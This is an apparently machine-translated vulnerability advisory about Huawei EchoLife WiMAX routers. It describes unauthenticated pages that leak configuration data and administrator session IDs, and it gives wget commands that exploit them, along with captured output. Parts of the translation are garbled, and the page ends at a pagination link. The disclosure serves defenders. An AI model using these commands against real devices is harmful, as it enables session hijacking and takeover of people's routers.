Huawei Wimax router is proof there are multiple vulnerabilities-vulnerability warning-the black bar safety net

2015-12-04T00:00:00
ID MYHACK58:62201569686
Type myhack58
Reporter 佚名
Modified 2015-12-04T00:00:00

Description

Vulnerability overview Huawei BM626e is a very rigorous Wimax router/Ap device, which may be the Internet provides a Wimax network. The following test is in the latest version of the firmware(V100R001CIVC24B010) Note: the firmware in other Wimax device also used to, according to Huawei official confirmed the following equipment is flawed: EchoLife BM626e WiMAX CPE EchoLife BM626 WiMAX CPE EchoLife BM635 WiMAX CPE EchoLife BM632 WiMAX CPE EchoLife BM631a WiMAX CPE EchoLife BM632w WiMAX CPE EchoLife BM652 WiMAX CPE Currently the router is still in some countries and regions, sales and use, at least for now we know the following countries and regions in the use of the products: MTN CI (Côte d'Ivoire) Iran Cell (Iran) Irak Telecom (Iraq) Libyamax (Libya) Globe Telecom (Philippines) Zain Bahrain (Bahrain) FreshTel (Ukraine) Details-unauthenticated leak sensitive information By default, http://192.168.1.1/check.html网页包含了重要信息(wimax configuration, network configuration, WiFi and sip configuration, etc.), however, these information is not used for authentication can be easily acquired! Although using a Javascript redirect can harass the attacker(/login.html), but by using wget can be easily acquired information? to: root@kali:~# wget http://192.168.1.1/check.html; less check.html Details-Admin session cookies hijacking If an administrator is currently managing the device(or are using the device, but did not use the correct way to disconnect), the attacker can steal is located in the LAN(or WAN: if the WAN interface in open-HTTP)of the current/use session The administrator session ID("SID")may be in multiple pages is not authenticated refind: a http://192.168.1.1/wimax/security.html http://192.168.1.1/static/deviceinfo.html ... security. the html page contains a valid session ID, and does not need to be authenticated. sid="SID24188" In JavaScript write a“protection”, the attacker redirects to the login page. But this Javascript contains the administrator session(sid="SIDXXXXX"), so the attacker can use the wget command to easily get the content: root@kali:~# wget http://192.168.1.1/wimax/security.html ; less security.html root@kali:~# wget http://192.168.1.1/static/deviceinfo.html ; less deviceinfo.html Please note: by accessing the web page, the attacker can through the admin panel disconnect administrator connection. Details-used to steal admin session ID can obtain sensitive information and conduct CSRF attacks Through the use of before to steal the SID, do not need any credentials will be able to perform the administrator only has permission to operate the task: Editing the WLAN configuration Editing the WAN configuration Edit the LAN configuration In the LAN and WAN interface open HTTP/HTTPS/TELNET/SSH Change DMZ configuration Edit port mapping To edit the port trigger program Edit the SIP configuration Upload a custom firmware ... Access to personal information(network information): root@kali:~# wget-qO- 'http://192.168.1.1/static/rethdhcp.jsx?WWW_SID=SID24188&t=0' Saving to: `STDOUT' stats={};do{stats. dhcplist="4 4:8A:5B:AA:AA:AA,192.168.1.3,71:52:02@00:E0:4C:AA:AA:AA,192.168.1.2,7 1:5 2:0 2"; stats. enrichment=" eth0 Link encap:Ethernet HWaddr 3 4:6B:D3:AA:AA:AA UP BROADCAST RUNNING PROMISC MULTICAST MTU:1 5 0 0 Metric:1 RX packets:2 7 errors:0 dropped:0 overruns:0 frame:0 TX packets:1 0 9 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1 0 0 0 RX bytes:2 8 8 7 (2.8 KiB) TX bytes:4 6 8 0 9 (45.7 KiB) Interrupt:9 Base address:0x4000 eth1 Link encap:Ethernet HWaddr 3 4:6B:D3:AA:AA:AA UP BROADCAST PROMISC MULTICAST MTU:1 5 0 0 Metric: RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1 0 0 0 RX bytes:0 (0.0 B) TX bytes:0 (0.0 B) Interrupt:9 Base address:0x4000 eth2 Link encap:Ethernet HWaddr 3 4:6B:D3:AA:AA:AA UP BROADCAST RUNNING PROMISC MULTICAST MTU:1 5 0 0 Metric:1 RX packets:2 5 3 0 errors:0 dropped:0 overruns:0 frame:0 TX packets:2 6 1 9 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1 0 0 0 RX bytes:3 5 1 5 5 7 (343.3 KiB) TX bytes:5 3 6 6 6 9 (524.0 KiB) Interrupt:9 Base address:0x4000 eth3 Link encap:Ethernet HWaddr 3 4:6B:D3:AA:AA:AA UP BROADCAST PROMISC MULTICAST MTU:1 5 0 0 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1 0 0 0 RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)

[1] [2] next